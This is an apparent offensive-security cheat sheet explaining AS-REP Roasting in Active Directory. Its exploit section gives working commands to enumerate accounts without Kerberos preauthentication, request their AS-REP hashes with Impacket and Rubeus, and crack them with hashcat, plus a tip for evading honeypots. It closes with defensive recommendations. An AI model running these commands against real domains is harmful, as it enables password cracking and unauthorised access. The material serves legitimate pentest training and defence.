AS-REP Roasting

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

AS-REP Roasting consists in identifying domain users that have the attribute DONT_REQ_PREAUTH enabled. With such an attribute, anyone can send an AS-REQ request on behalf of these users and receive an AS-REP message. This message contains data encrypted with the user key, derived from its password. Therefore, it’s possible to crack offline the password of the corresponding user.

This attack can be performed without any initial domain account. Nevertheless, a domain account is needed to list domain accounts vulnerable to AS-REP Roasting. Without, you’ll have to guess them.

Prerequisites

  • Low privileged domain account (to enumerate vulnerable domain users).
  • Target must be a domain user with “Do not require Kerberos preauthentication” (DONT_REQ_PREAUTH) enabled.

Exploit

To enumerate vulnerable accounts, use following commands. It’s also possible to do with with BloodHound.

# Using ActiveDirectory PowerShell module from a domain joined computer.
Get-ADUSer -Filter 'DoesNotRequirePreAuth -eq $True'

# Using PowerView from a domain joined computer.
Get-DomainUser -PreauthNotRequired -verbose

# Using ADSearch.
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# Using Impacket.
impacket-GetNPUsers -dc-ip $DomainControllerIP $DomainName/$Username:$Password

If domain contains accounts vulnerable to AS-REP roasting, request the AS-REP for concerned domain users on a targeted domain controller with Rubeus or impacket-GetNPUsers.

# From Kali.
impacket-GetNPUsers -dc-ip $DomainControllerIP -request -outputfile hashes.asreproast $DomainName/$Username:$Password

# From a domain joined computer.
.\Rubeus.exe asreproast /outfile:hashes.asreproast /nowrap

# From a Windows computer not joined to the domain.
.\Rubeus.exe asreproast /creduser:$DomainName\$Username /credpassword:$Password /domain:$DomainName /dc:$DomainControllerIP /outfile:hashes.asreproast /nowrap

If you want to be more stealthy and avoid honey pots, request one user at the time. For instance, with Rubeus, add /user:$target option.

Then, crack the AS-REP hash. You can use hashcat to do that.

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Recommendations

  • Disable “Do not require Kerberos preauthentication” for domain users when it’s technically possible.
  • If disabling “Do not require Kerberos preauthentication” isn’t technically possible, enforce strong password for involved domain users so it makes it hard - even impossible - to crack them.